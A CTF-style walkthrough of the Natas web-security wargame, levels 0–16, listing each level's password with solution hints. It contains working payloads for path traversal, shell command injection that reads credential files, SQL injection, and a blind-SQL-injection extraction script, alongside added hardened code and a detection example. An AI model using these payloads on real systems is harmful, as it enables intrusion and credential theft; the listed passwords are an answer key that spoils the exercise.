Note: The Python script to scrape the password for these challenges was an assignment during my graduate studies. Due to academic policies, it is not available publicly. I am happy to share my work privately - reach out to me via LinkedIn.

Have fun learning web-security :)

Natas answers for levels 1 - 15

Level 0 -> 1

username - natas0 and password - natas0

In level 0, after logging in, right-click on the webpage and view the page source. The password for the next level is written in a comment in the source code.

Level 1 -> 2

username - natas1 and password - g9D9cREhslqBKtcA2uocGHPfMZVzeFK6

This level is similar to the previous one, except that right-clicking is now blocked. So instead we use the keyboard shortcut (usually Ctrl+Shift+C, but it may differ in the browser that you are using).

Level 2 -> 3

username - natas2 and password - h4ubbcXrWqsTo7GGnnUMLppXbOogfBZ7

We can view the source code at this level, but there are no comments. We do find another directory referenced in the source code as <img src='files/pixel.png'>, indicating that there is a directory where files are kept. So you add /files to the current URL. You should see a listing of the files in that directory and notice one named users.txt. You should be able to find the password for the next level when reading this file.

Level 3 -> 4

username - natas3 and password - G6ctbMJ5Nb4cbFwhpMPSvxGHhQ7I6W8Q

In the source code of this webpage, we find a comment that says <!-- No more information leaks!! Not even Google will find it this time... -->. This hints that we should look at the robots.txt file, so you add /robots.txt to the URL to view it. This file tells search engines which directories they may or may not crawl on the website. In it, we find a directory that bots have been told not to crawl, s3cr3ts. Now we replace /robots.txt with the newly found directory and find a users.txt file, similar to the previous challenge. Here you will find the password for the next level.

Level 4 -> 5

username - natas4 and password - tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm

This level requires you to understand how to use Burp Suite (or another tool that lets you manipulate request headers). After logging into the website using the credentials found in the previous challenge, capture the headers sent in the GET request. Now change the natas level in the Referer header from natas4 (the rest of the value stays the same) to natas5 (the rest of the value stays the same as the original). After changing the Referer, send the GET request with the modified headers. You should be able to view the password for the next level in the page content returned for that request.

Level 5 -> 6

username - natas5 and password - Z0NsrtIkJoKALBCLi5eqFfcRN82Au2oD

This level is similar to the previous one. Capture the request headers and change the login status from False to True.

Level 6 -> 7

username - natas6 and password - fOIvE0MDtPTgRhqmmvvAOt2EfXR6uQgR

This level requires you to do more digging on the website. If you view the source code, there is a hint: the entered value is compared against a variable that comes from the /includes/secret.inc page. When you open that page, it is blank, which is meant to confuse the attacker. However, the variable referenced in the main page's source code comes from secret.inc, so there must be a variable there holding the correct value that unlocks the password for the next level. If you view the source code of the blank page at /includes/secret.inc, you should find the variable with the "secret" value inside a comment.

Level 7 -> 8

username - natas7 and password - jmxSiH3SP6Sonf8dv66ng8v1cIEdjXWr

The hint that leads us to the password is again in the source code. This time the hint is direct: <!-- hint: password for webuser natas8 is in etc/natas_webpass/natas8 -->. This means all we need to do is read that path on their server to view the password for the next level. If you have used Linux before, you will be familiar with using .. to move to the parent directory. If you haven't, I would suggest you look it up and, if possible, try it out to understand it better. There is a web vulnerability called Local File Inclusion that lets a user read local files on the server by using ../ to climb to parent directories and then entering the directory they want to view. When you view the "home" or "about" page, notice the ?page= parameter in the URL. The web server loads the page named after this parameter. So when we add ../../../../../../../etc/natas_webpass/natas8 after ?page= in the URL and hit enter, the webpage should show the password for the next level.
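The ?page= loader described above is the textbook path traversal case. As an added example that is not the Natas source, the snippet below writes such a loader two ways in Python: one that joins the parameter onto the pages directory unchecked, and one that resolves the final path and refuses anything outside that directory. The directory tree it reads from is a constructed temporary one (pages/home.txt plus a secret.txt one level up), not the real server paths.

```python
import os
import tempfile

# Added example, not the Natas source: a minimal "?page=" loader written two ways.
# Both read a file named by the request parameter; only the second confines the
# lookup to the pages directory.

def load_page_vulnerable(pages_dir: str, page: str) -> str:
    """Mirrors the flaw: the parameter is joined onto the directory unchecked,
    so '../' segments walk out of pages_dir."""
    with open(os.path.join(pages_dir, page), encoding="utf-8") as f:
        return f.read()

def load_page_hardened(pages_dir: str, page: str) -> str:
    """Resolve the final path and refuse anything outside pages_dir.
    An allowlist of known page names (e.g. {'home', 'about'}) is simpler still."""
    base = os.path.realpath(pages_dir)
    target = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"refusing to serve a path outside {base}: {page!r}")
    with open(target, encoding="utf-8") as f:
        return f.read()

def demo() -> dict:
    """Build a throwaway tree (constructed stand-ins, not real Natas paths):
    pages/home.txt plus a secret.txt one level up, then try both loaders."""
    root = tempfile.mkdtemp()
    pages = os.path.join(root, "pages")
    os.mkdir(pages)
    with open(os.path.join(pages, "home.txt"), "w", encoding="utf-8") as f:
        f.write("welcome")
    with open(os.path.join(root, "secret.txt"), "w", encoding="utf-8") as f:
        f.write("not-for-the-web")
    results = {}
    # The unchecked loader happily climbs out of the pages directory.
    results["vulnerable"] = load_page_vulnerable(pages, "../secret.txt")
    # The hardened loader refuses the same request.
    try:
        load_page_hardened(pages, "../secret.txt")
        results["hardened"] = "served"
    except PermissionError:
        results["hardened"] = "blocked"
    # Legitimate pages still work.
    results["legit"] = load_page_hardened(pages, "home.txt")
    return results

if __name__ == "__main__":
    print(demo())
```

The realpath-plus-commonpath check also defeats symlink tricks and encoded variants of "..", because the comparison happens on the fully resolved path rather than on the raw string.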

Level 8 -> 9

username - natas8 and password - a6bZCNYwdKqN5cGP11ZdtPg0iImQQhAB

This time, you see a form field with a submit button. As in the previous challenges, we begin by viewing the source code of the index page. In it we find an encoded secret written directly into the code, together with the function that produced it. The secret is not encrypted, only encoded, so the steps can be undone in reverse order. In Python: decodedstr = base64.b64decode(bytes.fromhex(encodedstr)[::-1]).decode('utf-8')
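To make the point that this is reversible encoding rather than encryption, here is an added example (not from the write-up) that implements both directions of the chain the one-liner above undoes: base64-encode, reverse, hex-encode on the way in; hex-decode, reverse, base64-decode on the way out. The sample secret is a constructed value.

```python
import base64

# Added example, not the Natas source: the level-8 secret goes through three
# reversible steps, so anyone who can read the encoded value can recover it.

def encode_secret(secret: str) -> str:
    """base64-encode, reverse the text, then hex-encode."""
    b64 = base64.b64encode(secret.encode("utf-8"))
    return b64[::-1].hex()

def decode_secret(encoded: str) -> str:
    """Undo encode_secret step by step in reverse: hex-decode, reverse, base64-decode."""
    return base64.b64decode(bytes.fromhex(encoded)[::-1]).decode("utf-8")

if __name__ == "__main__":
    sample = "constructed-sample-secret"  # constructed value, not the real level secret
    enc = encode_secret(sample)
    print(enc)
    print(decode_secret(enc))
```

A secret that must survive being published in page source needs a one-way construction (a salted password hash compared server-side), not an encoding that any reader can invert.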

Level 9 -> 10

username - natas9 and password - Sda6t0vkOPkM8YeOZkAGVhFoaplvlJFd

Inject the form field with: ; cat /etc/natas_webpass/natas10*

Level 10 -> 11

username - natas10 and password - D44EcsFkLxPIkAAKLosx8z3hxX1Z4MCE

Inject the form field without ";", using "." instead (otherwise the same injection string as in the previous challenge).
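Levels 9 and 10 both come down to user text being spliced into a shell command, with level 10 adding a blocklist of shell metacharacters. The added example below (not the Natas source, which is PHP) shows in Python why the blocklist is not a fix: it compares how a shell would tokenise the concatenated command with an argv list that never touches a shell. No command is executed; shlex.split only shows the split the shell would perform.

```python
import re
import shlex

# Added example, not the Natas source: the search box value is spliced into
# "grep -i <value> dictionary.txt". Three ways of handling that value.

BLOCKLIST = re.compile(r"[;|&]")  # the style of filter level 10 relies on

def shell_tokens(needle: str) -> list:
    """How a shell would split the concatenated command line (nothing is run)."""
    return shlex.split("grep -i " + needle + " dictionary.txt")

def blocklist_accepts(needle: str) -> bool:
    """The level-10 approach: reject a few metacharacters, pass everything else."""
    return BLOCKLIST.search(needle) is None

def argv_command(needle: str) -> list:
    """The hardened form: the process is started with an argument list, so the
    whole string is exactly one argument to grep. '--' stops an input beginning
    with '-' from being parsed as a grep option."""
    return ["grep", "-i", "--", needle, "dictionary.txt"]

if __name__ == "__main__":
    for needle in ["apple", "apple; id", "apple /other/file"]:
        print(repr(needle))
        print("  blocklist accepts:", blocklist_accepts(needle))
        print("  shell would run  :", shell_tokens(needle))
        print("  argv form        :", argv_command(needle))
```

The third input contains no blocked character, yet the shell splits it into an extra file argument for grep. The argv form keeps it as a single pattern, which is why subprocess.run with a list (and never shell=True) is the usual recommendation.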

Level 11 -> 12

username - natas11 and password - 1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg

XOR cipher: the encrypted string is in the source code, which also shows the order in which the encryption and encoding steps are applied.

Level 12 -> 13

username - natas12 and password - YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG

Upload any file, then go to Inspect > Elements and change the random file name to the format that will unlock the password for the next level (the required filename format is in the source code).

Level 13 -> 14

username - natas13 and password - lW3jYRI02ZKDBb8VtQBU1f6eDRo6WEj9

Open the file in a text editor and add the image file signature GIF87a at the beginning; the rest is the same as natas12. You can use any other image signature, since you only need to satisfy one of the functions that look for image signatures in the uploaded file (see the source code). Refer to this Wikipedia page for other signatures - https://en.wikipedia.org/wiki/List_of_file_signatures

Level 14 -> 15

username - natas14 and password - qPazSJBmrmU7UQJv17MHk1PGC4DxZMEP

SQL injection: use any string for the username (which user would exist by default?) and use " or "1"="1 as the password.
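The reason that password string works is that the query is built by string concatenation, so the closing quote ends the literal and the rest becomes SQL. As an added example (not the Natas source), here is the same login check in Python against an in-memory SQLite table with one constructed user, once concatenated and once parameterised. SQLite delimits strings with single quotes, so the payload uses ' where the MySQL-backed challenge accepts "; the structure is identical.

```python
import sqlite3

# Added example, not the Natas source: a concatenated login query (the level-14
# flaw) beside a parameterised one, both run against a constructed table.

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")  # constructed row
    conn.commit()
    return conn

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """User input is pasted into the SQL text, so a quote in the input ends the literal."""
    query = ("SELECT * FROM users WHERE username='" + username +
             "' AND password='" + password + "'")
    return conn.execute(query).fetchone() is not None

def login_parameterised(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Placeholders keep the input as data; the driver never lets it become SQL."""
    query = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None

if __name__ == "__main__":
    conn = make_db()
    payload = "' or '1'='1"  # single-quote form of the page's payload
    print("vulnerable   :", login_vulnerable(conn, "anyone", payload))
    print("parameterised:", login_parameterised(conn, "anyone", payload))
```

With the payload, the concatenated query becomes WHERE username='anyone' AND password='' or '1'='1', and since AND binds tighter than OR the always-true clause admits the request. The parameterised version compares the password column against the literal text of the payload and finds no row.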

Level 15 -> 16

username - natas15 and password - TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB

Blind SQL injection: it's a trial-and-error method of performing SQL queries to retrieve the desired data one piece at a time (look it up to learn more).

I used Python to perform the blind SQL injection for this challenge; you can use any language you are comfortable with.

import requests

url = 'http://natas15.natas.labs.overthewire.org/index.php'
auth = ('natas15', 'TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB')  # auth creds from the previous challenge

passwordlist = []  # characters recovered so far, in order
ch = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"  # charset

# The next 2 lines were written to understand the response of the SQL query performed.
# resp = requests.get(url, auth=auth, params={"username": "natas16\" and password like binary \"%"})
# print(resp.text)

# Then the rest of the code was built after understanding the TRUE and the FALSE response we received.
for i in range(32):  # the password is 32 characters long, so we need to guess 32 characters and hence iterate 32 times
    for j in ch:  # iterate through every character from the charset
        # the prefix found so far plus the candidate j; "like binary" makes the comparison case-sensitive
        resp = requests.get(url, auth=auth, params={"username": "natas16\" and password like binary \"" + "".join(passwordlist) + j + "%"})  # perform a GET request
        if "This user exists" in resp.text:  # a TRUE response means the candidate extends the known prefix
            print(f"The character no {i+1} of the password found is : {j}")
            passwordlist.append(j)  # append the matching character
            break

password = "".join(passwordlist)

print(f"\nThe password for Natas Level 16 is : {password}")
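Seen from the server side, a character-by-character extraction like the one above is noisy: one client sends hundreds of near-identical requests whose username parameter carries SQL fragments. The added example below (not part of the write-up) scans a few constructed access-log lines in Apache/nginx combined format, flags parameter values that look like SQL, and reports clients that exceed a threshold. The log lines and addresses are constructed, not real Natas logs.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlparse

# Added example, not part of the write-up: spot a blind-injection probe pattern
# in access logs. SAMPLE_LOG is constructed; the probe lines mimic the query the
# script above sends with a growing prefix.
SAMPLE_LOG = """\
203.0.113.5 - natas15 [01/Jan/2024:10:00:01 +0000] "GET /index.php?username=alice HTTP/1.1" 200 512
203.0.113.5 - natas15 [01/Jan/2024:10:00:02 +0000] "GET /index.php?username=natas16%22%20and%20password%20like%20binary%20%22a%25 HTTP/1.1" 200 512
203.0.113.5 - natas15 [01/Jan/2024:10:00:02 +0000] "GET /index.php?username=natas16%22%20and%20password%20like%20binary%20%22b%25 HTTP/1.1" 200 512
203.0.113.5 - natas15 [01/Jan/2024:10:00:03 +0000] "GET /index.php?username=natas16%22%20and%20password%20like%20binary%20%22c%25 HTTP/1.1" 200 512
198.51.100.9 - natas15 [01/Jan/2024:10:00:04 +0000] "GET /index.php?username=bob HTTP/1.1" 200 512
"""

# client IP, request path and status code from a combined-format line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
# SQL keywords as whole words, or a quote character, inside a parameter value
SQL_HINTS = re.compile(r"\b(and|or|like|binary|union|select|sleep)\b|[\"'`]", re.IGNORECASE)

def suspicious_params(request_path: str) -> list:
    """Return (name, value) pairs from the query string whose value looks like SQL.
    parse_qs percent-decodes the values, so %22 becomes a quote before matching."""
    qs = parse_qs(urlparse(request_path).query)
    flagged = []
    for name, values in qs.items():
        for v in values:
            if SQL_HINTS.search(v):
                flagged.append((name, v))
    return flagged

def scan(log_text: str, threshold: int = 3) -> dict:
    """Count flagged requests per client IP and return clients at or above threshold."""
    counts = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, _status = m.groups()
        if suspicious_params(path):
            counts[ip] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The threshold is the interesting knob: a single quote in a parameter is ordinary traffic, but dozens of flagged requests from one address within seconds, each differing by one character, is the signature of an extraction loop. Rate limiting on the vulnerable endpoint and, above all, parameterised queries remove the problem at the source.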

Credentials for the next challenge, level 16 -> 17: username - natas16 and password - TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V